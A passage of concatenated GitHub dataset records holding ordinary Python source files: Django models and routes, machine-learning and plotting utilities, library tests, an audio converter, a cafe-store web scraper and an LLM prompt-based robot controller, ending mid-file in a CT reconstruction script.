License declaration',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n 'bag_recorder = bag_recorder.bag_recorder:main',\n ],\n },\n)\n","repo_name":"twaddellberkeley/SpaceCAL","sub_path":"src/bag_recorder/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"859340622","text":"from django.db import models\nfrom mptt.models import MPTTModel, TreeForeignKey\n\n# Create your models here.\n\n\nclass BaseModel(models.Model):\n created_at = models.DateTimeField(auto_now_add=True, null=True, blank=True)\n updated_at = models.DateTimeField(auto_now=True, null=True, blank=True)\n is_active=models.BooleanField(default=True)\n class Meta:\n abstract = True\n \n\nclass PromoCode(BaseModel):\n user = models.CharField(max_length=255, null=True, blank=True)\n promo_code = models.CharField(max_length=255, unique=True)\n discount = models.IntegerField()\n \n def __str__(self):\n return f'{self.promo_code} | {self.discount}'\n \n class Meta:\n verbose_name_plural = \"Promo Codes\"\n ordering = [\"-created_at\"]\n \nclass BotUsers(BaseModel):\n telegram_id = models.IntegerField(unique=True)\n telegram_full_name = models.CharField(max_length=255, null=True, blank=True)\n telegram_username = models.CharField(max_length=255, null=True, blank=True)\n telegram_phone_number = models.CharField(max_length=20, null=True, blank=True)\n promo_code = models.ForeignKey(PromoCode, on_delete=models.CASCADE, null=True, blank=True, to_field=\"promo_code\")\n \n def __str__(self):\n return f'{self.telegram_id} | {self.telegram_full_name}'\n \n class Meta:\n verbose_name_plural = \"Bot Users\"\n ordering = [\"-created_at\"]\n \n \nclass Order(BaseModel):\n check_id = models.CharField(max_length=255, null=True, blank=True)\n user = models.ForeignKey(BotUsers, on_delete=models.CASCADE, to_field=\"telegram_id\", related_name=\"user_orders\")\n promo_code = models.CharField(max_length=35, null=True, blank=True)\n discount = models.IntegerField(null=True, blank=True)\n full_name = models.CharField(max_length=255, null=True, blank=True)\n phone_number = models.CharField(max_length=20, null=True, blank=True)\n email = models.EmailField(null=True, blank=True)\n total_price = models.IntegerField()\n total_price_with_discount = models.IntegerField(null=True, blank=True)\n is_paid = models.BooleanField(default=False)\n \n def __str__(self):\n return f'{self.user} | {self.total_price_with_discount}'\n \n class Meta:\n verbose_name_plural = \"Orders\"\n ordering = [\"-created_at\"]\n \n def save(self, *args, **kwargs):\n if self.promo_code:\n discount = PromoCode.objects.get(promo_code=self.promo_code).discount\n self.discount = discount\n self.total_price_with_discount = self.total_price - discount\n \n else:\n self.total_price_with_discount = self.total_price\n super(Order, self).save(*args, **kwargs)\n \n def telegram_id(self):\n return self.user.telegram_id","repo_name":"jaloliddin1006/videocoursebot","sub_path":"backend/main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8713381950","text":"# Standard libraries\nimport numpy as np\nimport pandas as pd\n\n# Keras and Tensorflow\nimport tensorflow as tf\nimport keras\n\n# saving to cloud storage\nfrom datetime import datetime\nfrom google.cloud import storage\nfrom custom_libraries import gcloud_storage #local py file\n\n\ndef save_model(model, model_tags = [],return_df=False, model_notes = \"\", loss = \"\", optimizer = \"\", dim = \"\", epochs = 0, train_size = 0, validation_size = 0):\n \"\"\"\n Save model in the designated root folder\n Add a row to the model_records.csv with information about the current training run\n Keyword arguments:\n model -- keras model\n \"\"\"\n \n # get the current time\n d = datetime.utcnow()\n timestamp = d\n time_name = d.strftime(\"%Y-%m-%dT%H%M%S\")\n\n # set folder paths and other saving specs\n root = 'models/'\n save_as_type = 'h5' # can choose 'h5' or 'tf'\n model_records_path = root+'model_records.csv'\n model_name = time_name+'_model'+'.'+save_as_type\n model_path = root+model_name\n \n \n # model attributes\n # added the below as input parameters\n# dim = dim\n# train_size = 1\n# validation_size = 1 \n# epochs = 1\n# optimizer = 1\n # train_data_class_imbalance = \n\n layers = []\n num_layers = len(layers)\n\n # create a unique set of tags, include tensorflow and keras\n model_tags = set([x.lower() for x in model_tags + ['tensorflow','keras']])\n\n # model effectiveness \n score = 1\n \n # training information\n total_time = 1\n \n data = {\n # general\n 'timestamp': [timestamp],\n 'model_notes': [model_notes],\n # model attributes\n 'dim': [dim],\n 'train_size': [train_size],\n 'validation_size': [validation_size],\n 'epochs': [epochs],\n 'optimizer': [optimizer],\n 'num_layers': [num_layers],\n 'model_tags': [model_tags],\n 'layers': [layers],\n # model effectiveness\n# 'loss': [loss],\n # added below\n 'score': [score],\n # training specification\n # saving information\n 'model_name': [model_name],\n 'model_path': [model_path]\n }\n\n# for attribute in model.metrics_names:\n# try:\n# data[attribute] = model[attribute]\n# except:\n# print(\"model.\"+attribute+\" is not a valid parameter\")\n \n # save the data to a dictionary\n temp_df = pd.DataFrame.from_dict(data)\n \n # attempt to amend the previous csv. If not available, create a new one\n \n# try:\n# load from google\n# except:\n# model_records_path = root + \"model_records_conflicting_\" + time_name + \".csv\"\n\n try:\n df = pd.read_csv(model_records_path)\n df = pd.concat([df,temp_df],sort=False)\n except:\n df = temp_df\n finally:\n df.reset_index(drop=True,inplace=True)\n \n # save df to csv\n df.to_csv(model_records_path,index=False)\n \n # trying with save_model instead of model.save\n keras.models.save_model(model, model_path)\n \n# # save csv to cloud\n# try:\n# upload_blob(\"fi-capstone-data\",model_path,model_path)\n# upload_blob(\"fi-capstone-data\",model_records_path,model_records_path)\n# except:\n# print(\"MODEL AND RECORDS NOT SAVED TO CLOUD\")\n \n\n if return_df:\n return df\n \n \n\ndef load_model(root = 'models/', records_output = True, model_output = False, model_file_path = \"\"):\n \"\"\"load previous models\n Output:\n df of records of previous models (if records_output == True and model_output == False)\n .h5 file of specifified model (if records_output == False and model_output == True)\n df of records, .h5 of mode (if records_output == True and model_output == True)\n \n Key arguments:\n root = root folder - defaults to 'models/'\n records_output: determines whether the records_df is output\n model_output: determines whether the model .h5 file is output\n model_file_path: file path of model, required when model_output = True\n \"\"\"\n\n model_records_path = root+'model_records.csv'\n df = pd.read_csv(model_records_path)\n if not model_output:\n return df\n else:\n \n model = tf.keras.models.load_model(model_file_path)\n if records_output:\n return df, model\n else:\n return model","repo_name":"RumTumTum/capstone","sub_path":"custom_libraries/file_saving.py","file_name":"file_saving.py","file_ext":"py","file_size_in_byte":4314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73254146725","text":"from django.contrib.auth.views import LoginView\nfrom django.urls import path\nfrom . import views\n\napp_name = 'patient'\n\nurlpatterns = [\n path('patientsignup/', views.patient_signup_view, name='patientsignup'),\n path('patientlogin/', LoginView.as_view(template_name='patient/patientlogin.html'), name='patientlogin'),\n path('patient-dashboard', views.patient_dashboard_view,name='patient-dashboard'),\n path('make-requests', views.make_request_view,name='make-requests'),\n path('my-request', views.my_request_view,name='my-request'),\n]\n","repo_name":"tarun3154/blood-donate","sub_path":"bloodBank/patient/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37556877358","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nimport sys\n\ndf = pd.read_csv('Human_mark.csv')\n\ndf_100 = df[df['threshold'] == 100]\n\ny = sys.argv[1]\n\ntools = df_100['tool'].unique()\nfig, ax = plt.subplots(figsize=(12, 8))\n\ncolors = {'smoove':'orangered','genomestrip':'pink','manta':'aqua', 'VISTA':'black','parl':'magenta','surv':'purple','jasmine':'lightblue',\n 'octopus':'coral','delly':'darkorange'}\n\n\nlabel_mapping = {\n 'jasmine': 'Jasmine*',\n 'octopus': 'Octopus',\n 'VISTA': 'VISTA*',\n 'parl': 'Parliament2*',\n 'delly': 'DELLY',\n 'surv': 'SURVIVOR*',\n 'smoove': 'Smoove',\n 'manta': 'Manta'\n}\n\nfor i, tool in enumerate(tools):\n tool_df = df_100[df_100['tool'] == tool]\n if y == \"f-score\":\n ax.plot(tool_df['strain'], tool_df['f-score'], color=colors[tool.replace(\" \",\"\")], label=tool)\n ax.scatter(tool_df['strain'], tool_df['f-score'], color=colors[tool.replace(\" \",\"\")], s=10)\n if y == \"sensitivity\": \n ax.plot(tool_df['strain'], tool_df['sensitivity'], color=colors[tool.replace(\" \",\"\")], linestyle='dashed')\n ax.scatter(tool_df['strain'], tool_df['sensitivity'], color=colors[tool.replace(\" \",\"\")], s=10)\n\n if y == \"precision\" :\n ax.plot(tool_df['strain'], tool_df['precision'], color=colors[tool.replace(\" \",\"\")], linestyle='dotted')\n ax.scatter(tool_df['strain'], tool_df['precision'], color=colors[tool.replace(\" \",\"\")], s=10)\n\nax.set_xlabel('Human strains')\ny = y.capitalize()\nax.set_ylabel(str(y))\n\nax.set_ylim(0, 1)\n\ntool_legend_elements = [Line2D([0], [0], color=colors[tool.replace(\" \",\"\")], label=label_mapping[tool.replace(\" \",\"\")]) for i, tool in enumerate(tools)]\nline_legend_elements = [\n Line2D([0], [0], color='black', label='F-Score'),\n Line2D([0], [0], color='black', linestyle='dashed', label='Sensitivity'),\n Line2D([0], [0], color='black', linestyle='dotted', label='Precision')\n]\n\n# Create a separate legend box for the tool names\ntool_legend = ax.legend(handles=tool_legend_elements, loc='upper left', bbox_to_anchor=(1, 0.5))\n\n# Create a separate legend box for F-score, Precision, and Sensitivity\nline_legend = ax.legend(handles=line_legend_elements, loc='lower center', bbox_to_anchor=(0.5, -0.2), ncol=3)\n\n# Add the line legend and tool legend back to the plot\nax.add_artist(tool_legend)\nax.add_artist(line_legend)\n\nplt.xticks(rotation=45)\n\nplt.tight_layout()\n\n# Show the plot\nplt.show()\nplt.savefig(\"mark_plot_\"+ sys.argv[1]+\".png\", bbox_inches='tight')\n","repo_name":"Mangul-Lab-USC/VISTA_paper","sub_path":"scripts/HPRC/mark_plot_customize.py","file_name":"mark_plot_customize.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29774137254","text":"from pathlib import Path\nimport shepherd_data.ivonne as ivonne\nimport shepherd_data.mppt as mppt\n\n# this repo contains a recording from ivonne\n# -> consists of voc & isc with 50 Hz sampling rate\n\n# this script converts a IVonne-Recording to shepherd dataformat:\n# - ivcurves that can be harvested during emulation\n# - ivsamples that can be directly used for emulation (already harvested with to different algorithms)\n# - isc_voc not directly usable (for now)\n\nif __name__ == \"__main__\":\n\n inp_file_path = Path(\"./jogging_10m.iv\")\n isc_file_path = Path(\"./jogging_10m_isc_voc.h5\")\n ivc_file_path = Path(\"./jogging_10m_ivcurves.h5\")\n voc_file_path = Path(\"./jogging_10m_ivsamples_voc.h5\")\n opt_file_path = Path(\"./jogging_10m_ivsamples_opt.h5\")\n\n with ivonne.Reader(inp_file_path) as db:\n db.upsample_2_isc_voc(isc_file_path)\n\n db.convert_2_ivcurves(ivc_file_path)\n\n tr_voc = mppt.OpenCircuitTracker(ratio=0.76)\n tr_opt = mppt.OptimalTracker()\n\n db.convert_2_ivsamples(voc_file_path, tracker=tr_voc)\n db.convert_2_ivsamples(opt_file_path, tracker=tr_opt)\n","repo_name":"geissdoerfer/shepherd-datalib","sub_path":"example_convert_ivonne.py","file_name":"example_convert_ivonne.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40787295761","text":"import os\n\nos.environ[\"PYSPARK_PYTHON\"] = \"D://Python3//python.exe\"\n\nfrom pyspark import *\nfrom pyspark.sql import *\nimport matplotlib.pyplot as plt\n\n\ndef parse_group_result(time_array, status, tuple_list):\n print(\"\\nstatus:\" + str(status))\n\n print(\"time_array:\")\n print(time_array)\n dict = {}\n [dict.setdefault(each_time, each_Value) for each_time, each_Value in tuple_list]\n print(\"tuple_dict:\")\n print(dict)\n\n value_array = []\n for data_time in time_array:\n if data_time in dict:\n value = dict.get(data_time)\n value_array.append(value if value != 'None' else 0)\n else:\n value_array.append(0)\n\n print(\"value_array:\")\n print(value_array)\n return status, value_array\n\n\ndef show_as_line(rdd, legend_desc):\n time_array = rdd.map(lambda p: p[1]).distinct(1).collect()\n time_array.sort()\n print(time_array)\n\n values_rdd = rdd.map(lambda p: (str(p[0]), (p[1], p[2]))).groupByKey()\n r_map = values_rdd.map(\n lambda data: parse_group_result(time_array, data[0], data[1])).collectAsMap()\n\n fig, ax = plt.subplots()\n\n ax.set_xlabel('Time')\n ax.set_ylabel('Count')\n\n yticks = range(0, 100, 5)\n ax.set_yticks(yticks)\n # ax.set_ylim([0, 10])\n\n # xticks = range(0, 100, 5)\n # ax.set_yticks(yticks)\n\n for a, b in r_map.items():\n ax.plot(time_array, b, \"-\", label=legend_desc + str(a))\n\n \"\"\"open the grid\"\"\"\n plt.grid(True)\n plt.legend()\n plt.show()\n\n\nif __name__ == '__main__':\n conf = SparkConf().setAppName(\"logReader\").setMaster(\"local[10]\")\n conf.set(\"mytest.sql.crossJoin.enabled\", True)\n conf.set(\"mytest.sql.shuffle.partitions\", 5)\n conf.set(\"mytest.defalut.parallelism\", 10)\n sc = SparkContext(conf=conf)\n sql_context = SQLContext(sc)\n # sc.setLogLevel(\"DEBUG\")\n\n # files=[\"E://logs//ceph//ucsm-osd.37.log\",\"E://logs//ceph//ucsm-osd.39.log\",\n # \"E://logs//ceph//ucsm-osd.42.log\", \"E://logs//ceph//ucsm-osd.43.log\"]\n\n # files = [\"E://logs//ceph//ucsm-osd.*.log\"];\n file = \"E://mldata//predict//hostresource_nonet.csv\";\n\n df = sql_context.read.format('com.databricks.spark.csv').options(header='true', inferschema='true').load(\n file)\n data_rdd = df.select(\"hostaddr\", \"createtime\", \"cpu_usage\").filter(\"hostaddr='192.168.232.183'\").rdd\n data_rdd.cache()\n print(data_rdd.take(3))\n show_as_line(data_rdd, \"cpu\")\n","repo_name":"happy-lu/spark","sub_path":"predict/TimeSeries2.py","file_name":"TimeSeries2.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14540419780","text":"\"\"\"This test file is ignored by mypy so don't rely on type assertions in this.\n\nInstead, take a look at the ``tests/test_mypy.py``.\n\"\"\"\nimport pytest\nfrom web_poet import HttpResponse, RequestUrl, ResponseUrl\n\nfrom zyte_common_items import (\n Breadcrumb,\n Image,\n Link,\n Product,\n ProductFromList,\n ProductList,\n ProductVariant,\n)\n\n\n@pytest.mark.parametrize(\n \"cls,fields\",\n [\n (Image, [\"url\"]),\n (Breadcrumb, [\"url\"]),\n (Link, [\"url\"]),\n (Product, [\"url\", \"canonicalUrl\"]),\n (ProductList, [\"url\", \"canonicalUrl\"]),\n (ProductFromList, [\"url\"]),\n (ProductVariant, [\"url\", \"canonicalUrl\"]),\n ],\n)\ndef test_webpoet_URL_classes(cls, fields):\n \"\"\"Ensure that the URL classes from web-poet are properly converted into\n URL strings when instantiating.\n \"\"\"\n url = \"https://www.some-url.com\"\n response = HttpResponse(url, b\"\")\n\n response_url_obj = response.url\n assert type(response_url_obj) == ResponseUrl\n\n request_url_obj = response.urljoin(\"/another-page\")\n assert type(request_url_obj) == RequestUrl\n\n # Ensure that both types of URL classes are covered\n for url_obj in [response_url_obj, request_url_obj]:\n data = {field: url_obj for field in fields}\n obj = cls(**data)\n\n for field in fields:\n # The URL classes should be converted to strings on instantiation\n attribute = getattr(obj, field)\n assert type(attribute) == str\n assert attribute == str(url_obj)\n\n # The conversion should also work via field assignment\n setattr(obj, field, response.urljoin(\"/somewhere\"))\n attribute = getattr(obj, field)\n assert type(attribute) == str\n assert attribute == \"https://www.some-url.com/somewhere\"\n\n # Setting other values that are not strings or URL classes would\n # raise a ValueError\n with pytest.raises(ValueError):\n setattr(obj, field, 123)\n\n\n@pytest.mark.parametrize(\"cls\", [ProductVariant, Product, ProductFromList])\ndef test_webpoet_URL_mainImage(cls):\n response = HttpResponse(\"https://www.some-page\", b\"\")\n data = {\n \"mainImage\": {\n \"url\": response.urljoin(\"img1.png\"),\n },\n \"url\": response.url,\n }\n assert type(data[\"mainImage\"][\"url\"]) == RequestUrl\n\n # The URL classes should be converted to strings on instantiation\n obj = cls.from_dict(data)\n assert type(obj.mainImage) == Image\n assert obj.mainImage.url == \"https://www.some-page/img1.png\"\n\n # The conversion should also work via field assignment\n img_url = response.urljoin(\"/different-img.png\")\n assert type(img_url) == RequestUrl\n obj.mainImage.url = img_url\n assert type(obj.mainImage) == Image\n assert obj.mainImage.url == \"https://www.some-page/different-img.png\"\n\n # Setting other values that are not strings or URL classes would\n # raise a ValueError\n with pytest.raises(ValueError):\n obj.mainImage.url = False\n\n data = {\"mainImage\": {\"url\": 123}, \"url\": 123}\n with pytest.raises(ValueError):\n obj = cls.from_dict(data)\n\n\n@pytest.mark.parametrize(\"cls\", [ProductVariant, Product])\ndef test_webpoet_URL_images(cls):\n response = HttpResponse(\"https://www.some-page\", b\"\")\n data = {\n \"images\": [\n {\"url\": response.urljoin(\"img1.png\")},\n {\"url\": response.urljoin(\"img2.png\")},\n ],\n \"url\": response.url,\n }\n assert type(data[\"images\"][0][\"url\"]) == RequestUrl\n\n # The URL classes should be converted to strings on instantiation\n obj = cls.from_dict(data)\n assert type(obj.images[0]) == Image\n assert [img.url for img in obj.images] == [\n \"https://www.some-page/img1.png\",\n \"https://www.some-page/img2.png\",\n ]\n\n # The conversion should also work via field assignment\n img_url = response.urljoin(\"/different-img.png\")\n assert type(img_url) == RequestUrl\n obj.images[0].url = img_url\n assert type(obj.images[0]) == Image\n assert obj.images[0].url == \"https://www.some-page/different-img.png\"\n\n # Setting other values that are not strings or URL classes would\n # raise a ValueError\n with pytest.raises(ValueError):\n obj.images[1].url = False\n\n data = {\n \"images\": [\n {\"url\": 123},\n {\"url\": 456},\n ],\n \"url\": 789,\n }\n with pytest.raises(ValueError):\n obj = cls.from_dict(data)\n","repo_name":"zytedata/zyte-common-items","sub_path":"tests/test_conversion.py","file_name":"test_conversion.py","file_ext":"py","file_size_in_byte":4492,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"38476182343","text":"import itertools\nimport os\nimport shutil\nimport sys\nimport threading\nimport time\n\ndef loading():\n for s in itertools.cycle(['|', '/', '-', '\\\\']):\n if done:\n break\n sys.stdout.write('\\rloading ' + s)\n sys.stdout.flush()\n time.sleep(0.1)\n\ndef options(option):\n global purge\n global rmFile\n if(option == \"p\"):\n purge = True\n if(option == \"r\"):\n rmFile = True\n\ndef osVersion(owd):\n global ffBin\n if os.name == 'nt':\n try:\n os.system('ffmpeg')\n os.system('cls')\n except:\n ffBin = owd+\"/ffmpeg/ffmpeg-latest-win64-static/bin/ffmpeg.exe\"\n else:\n ffBin = \"ffmpeg\"\n else:\n try:\n os.system('ffmpeg')\n os.system('clear')\n except:\n breaker = True\n else:\n ffBin = \"ffmpeg\"\n\ndef purger():\n youSure = raw_input(\"Are you sure?\\nType \\\"Yes\\\" if you're sure.> \")\n if(youSure == \"Yes\"):\n shutil.rmtree(musicDir)\n os.makedirs(musicDir)\n sys.exit()\n else:\n print(\"Continuing without Deletion\")\n sys.exit()\n\nafterSize = 0\nbeforeSize = 0\ndone = False\next = [\".mp3\", \".ogg\", \".m4a\", \".flac\"]\nnoRepeat = 0\nowd = os.getcwd()\npurge = False\nrmFile = False\n\nif os.path.isfile(\"directory.ini\"):\n musicDir = open('directory.ini').read()\n\nelse:\n musicDir = owd + \"/music\"\n if not os.path.exists(\"music\"):\n os.makedirs(\"music\")\n\nosVersion(owd)\n\nif not os.path.exists(\"ffmpeg\") and os.name == 'nt' and ffBin != \"ffmpeg\":\n print(\"Go get ffmpeg please. Or use the batch.\")\n sys.exit()\n\ndragNDrop = ''.join(sys.argv[1:2])\ndragNDrop2 = ''.join(sys.argv[2:3])\n\nif dragNDrop == 'h':\n print(\"Welcome to the Help Menu\\nh: Help\\np: Purge Old Files\\nr: Remove Original Files After Use\")\n raw_input(\"\\nPress Enter to quit...\")\n sys.exit()\n\nif dragNDrop != '':\n options(dragNDrop)\n\nif dragNDrop2 != '':\n options(dragNDrop2)\n\nif dragNDrop != '':\n if(purge == True):\n purger()\n\ng = threading.Thread(target=loading)\ng.start()\n\nfor dname, dirs, files in os.walk(musicDir):\n for fname in files:\n fpath = os.path.join(dname, fname)\n if fname.endswith(tuple(ext)):\n stopPoint = fpath.rfind('.')\n songName = fpath[:stopPoint]\n os.system(ffBin + \" -loglevel panic -y -i \\\"\" + fpath + \"\\\" -acodec libopus -vbr on \\\"\" + songName +\".opus\\\"\")\n try:\n beforeSize += os.path.getsize(fpath)\n afterSize += os.path.getsize(songName + \".opus\")\n except:\n if(noRepeat == 0):\n noRepeat = 1\n os.rename(songName + \".opus\",songName + \".ogg\")\n if dragNDrop != '':\n if(rmFile == True):\n try:\n os.remove(fpath)\n except:\n if(noRepeat == 0):\n print(\"Probably a Japanese file, it won't go through conversion.\")\n\nafterSize = afterSize/1000000\nbeforeSize = beforeSize/1000000\ndone = True\n\nprint(\"\\nAll done! Your music library went from being \" + str(beforeSize) + \"MBs, to being \" + str(afterSize) + \"MBs, congrats!\")\nraw_input(\"\\nPress Enter to continue...\")\n","repo_name":"GarnetSunset/Opusifier","sub_path":"opusiFier.py","file_name":"opusiFier.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74660465763","text":"class Solution(object):\n def isPalindrome(self, x):\n \n strlist = list(str(x))\n \n reversestr = list(reversed(strlist))\n if strlist == reversestr:\n return True\n else:\n return False\n \n# i = 0\n# while i == len(strlist):\n# if strlist[i] != reversestr[i]:\n# return False\n# i += 1\n \n# return True\n \n ","repo_name":"lsh981127/LeetCode","sub_path":"0009-palindrome-number/0009-palindrome-number.py","file_name":"0009-palindrome-number.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74781349605","text":"import unittest\nimport sqlite3\nfrom datetime import datetime\n\nfrom dateutil.tz import tzutc\n\nfrom logilab.common.testlib import MockConnection\n\nfrom logilab.database import sqlite as lgdbsqlite\nfrom logilab.database import get_connection, get_db_helper\n\n\nclass SQLiteHelperTC(unittest.TestCase):\n\n def setUp(self):\n self.cnx = MockConnection( () )\n self.helper = get_db_helper('sqlite')\n\n def test_type_map(self):\n self.assertEqual(self.helper.TYPE_MAPPING['TZDatetime'], 'tzdatetime')\n self.assertEqual(self.helper.TYPE_MAPPING['Datetime'], 'timestamp')\n self.assertEqual(self.helper.TYPE_MAPPING['String'], 'text')\n self.assertEqual(self.helper.TYPE_MAPPING['Password'], 'bytea')\n self.assertEqual(self.helper.TYPE_MAPPING['Bytes'], 'bytea')\n\n\nclass SQLiteAdapterTC(unittest.TestCase):\n\n @unittest.expectedFailure\n def test_only_one_lazy_module_initialization(self):\n self.assertFalse(lgdbsqlite._Sqlite3Adapter._module_is_initialized)\n adapter = lgdbsqlite._Sqlite3Adapter(sqlite3)\n self.assertTrue(adapter._module_is_initialized)\n\n def test_tzsupport(self):\n cnx = get_connection(database=':memory:', driver='sqlite')\n cu = cnx.cursor()\n cu.execute('CREATE TABLE tztest(tzt tzdatetime)')\n now = datetime.now(tzutc())\n cu.execute('INSERT INTO tztest VALUES (%(tzt)s)', {'tzt': now})\n cu.execute('SELECT * FROM tztest')\n dbnow = cu.fetchone()[0]\n self.assertEqual(dbnow, now)\n\n cu.execute('UPDATE tztest SET tzt=(%(tzt)s)', {'tzt': datetime.utcnow()})\n cu.execute('SELECT * FROM tztest')\n dbnow = cu.fetchone()[0]\n self.assertEqual(dbnow.tzinfo, tzutc())\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"gurneyalex/logilab-database","sub_path":"test/unittest_sqlite.py","file_name":"unittest_sqlite.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22648994376","text":"from 데이터수집.WebCrawling import getRequestUrl\nfrom bs4 import BeautifulSoup \nserviceUrl = 'https://www.hollys.co.kr/store/korea/korStore2.do?'\n\nitemList = []\nfor page in range(1, 2) : \n param = f'pageNo={page}'\n url = serviceUrl+param\n html = getRequestUrl(url)\n soup = BeautifulSoup(html, 'html.parser')\n #html\n #print(soup.prettify()) #HTML정보를 예쁘게 정렬해서 출력\n tag_tbody = soup.find('tbody') #tbody태그 하나만 찾아서 리턴\n tag_trs = tag_tbody.find_all('tr') #tr태그들 찾아서 리스트로 반환\n tag_trs\n for tr in tag_trs :\n #한행씩\n tag_tds = tr.find_all('td')\n itemDic = {}\n itemDic['지역정보'] = tag_tds[0].text #지역정보 \n itemDic['매장명'] = tag_tds[1].text \n itemDic['매장현황'] = tag_tds[2].text #(영업중, 오픈예정 등)\n itemDic['주소'] = tag_tds[3].text #매장주소 \n itemDic['전화번호'] = tag_tds[5].text #지역정보\n itemList.append(itemDic)\n\nprint(\"총 매장 개수 : \", len(itemList))\nitemList\n#데이터 저장\nimport json\nwith open('./데이터수집/정적웹크롤링/할리스카페매장.json', 'w',\n encoding='utf-8') as f :\n retJson = json.dumps(itemList, indent=4, ensure_ascii=False)\n f.write(retJson)\n\n#csv 파일 포맷으로 저장\n# 매장명,지역정보,주소,전화번호,..\n# 수워홀리스,권선동,권선동,010-311-3333\nwith open('./데이터수집/정적웹크롤링/할리스카페매장.csv', 'w',\n encoding='utf-8') as f :\n colList = itemList[0].keys()\n colList #dict_keys(['지역정보', '매장명', '매장현황', '주소', '전화번호'])\n ','.join(colList)+\"\\n\" #'지역정보,매장명,매장현황,주소,전화번호\\n'\n f.write(','.join(colList)+\"\\n\")\n for item in itemList :\n f.write(','.join(item.values()) + \"\\n\")\n\nimport pandas as pd\ndf = pd.DataFrame(itemList, columns=itemList[0].keys())\ndf.head()\ndf.info()\ndf.to_csv('./데이터수집/정적웹크롤링/할리스카페매장2.csv',\n encoding='utf-8', index=True)\n\ndf.to_json('./데이터수집/정적웹크롤링/할리스카페매장2.json',\n orient='records', force_ascii=False, indent=4)\n\n","repo_name":"sf7com/python_study","sub_path":"데이터수집/정적웹크롤링/2_할리스카페매장정보.py","file_name":"2_할리스카페매장정보.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30879939677","text":"import openai\nimport textwrap\n\ndef llm_init():\n openai.api_key = 'Please input your API key here.'\n\n global prompt_system, prompt_history, query_count\n\n prompt_system = '''\n You are the controller of a quadrupedal robot (A1 robot) with 10 Hz.\n Please inference the output.\n \n The robot's state is represented by a 33-dimensional input space.\n The first 3 dimensions correspond to the robot's linear velocity.\n The next 3 dimensions denote the robot's angular velocity.\n The following 3 dimensions represent the gravity vector.\n The subsequent 12 dimensions represent the joint positions.\n The final 12 dimensions indicate the velocity of each joint.\n\n The output space is 12-dimension, which is the joint position. \n \n The order of the joints is [FRH, FRT, FRC, FLH, FLT, FLC, RRH, RRT, RRC, RLH, RLT, RLC].\n\n After we have the output, we will use 200 Hz PD controller to track it.\n\n The following are past and consecutive inputs and outputs.\n All numbers are normalized to non-negative integers by our special rule. \n The output would be impacted by the previous inputs.\n The trend of the outputs should be smooth.\n\n Your output is only one line and starts with \"Output:\", please do not output other redundant words.\n \n '''\n prompt_system = textwrap.dedent(prompt_system)\n prompt_system = prompt_system.split('\\n', 1)[1]\n\n prompt_history = ''\n\n query_count = 0\n\ndef llm_query(msg, call_api=True):\n global prompt_system, prompt_history, query_count\n\n prompt_history = prompt_history + msg + '\\n'\n\n if call_api:\n completion = openai.ChatCompletion.create(\n model=\"gpt-4-0613\", # \"gpt-3.5-turbo-16k\"\n messages=[\n {\"role\": \"system\", \"content\": prompt_system},\n {\"role\": \"user\", \"content\": prompt_history}\n ],\n temperature=0.0\n )\n\n res = completion.choices[0].message.content\n res = res.split('\\n', 1)[0]\n\n query_count += 1\n\n if query_count > 50:\n prompt_history = prompt_history.split('\\n', 1)[1]\n prompt_history = prompt_history.split('\\n', 1)[1]\n\n if call_api:\n return res\n else:\n return None","repo_name":"HybridRobotics/prompt2walk","sub_path":"src/llm.py","file_name":"llm.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"52"} +{"seq_id":"28045505598","text":"\r\n#################################################################\r\n# Imports\r\n#################################################################\r\n\r\nimport numpy as np \r\nimport imutils\r\nfrom skimage.transform import rotate ## Image rotation routine\r\nimport scipy.fftpack as fft ## Fast Fourier Transform\r\nimport imageio ## Used to save images\r\nimport math\r\n\r\n#################################################################\r\n# Functions\r\n#################################################################\r\n\r\n#Converts the sinogram single channel \r\n#to frequency domain using fast fourier transform\r\ndef ch_fft(channel):\r\n #Build 1-d FFTs of an array of projections, each projection 1 row of the array.\r\n return fft.rfft(channel, axis = 1)\r\n\r\n# Filter the projections of each channel\r\n# using a ramp filter\r\ndef ramp_filter(ch_proj):\r\n #Ramp filter a 2-d array of 1-d FFTs (1-d FFTs along the rows).\r\n ramp = np.floor(np.arange(0.5, ch_proj.shape[1]//2 + 0.1, 0.5))\r\n return ch_proj * ramp\r\n\r\n# Applied Hamming windowed ramp filter to channel passed in.\r\ndef hamming_window(ch_proj): \r\n ramp = np.floor(np.arange(0.5, ch_proj.shape[1]//2 + 0.1, 0.5))\r\n window_filter = ramp\r\n \r\n # Initialise variables for hamming window\r\n c = 0.54\r\n N = ch_proj.shape[1] # length of input channel = 658\r\n hamming = np.zeros(N//2) # Array of 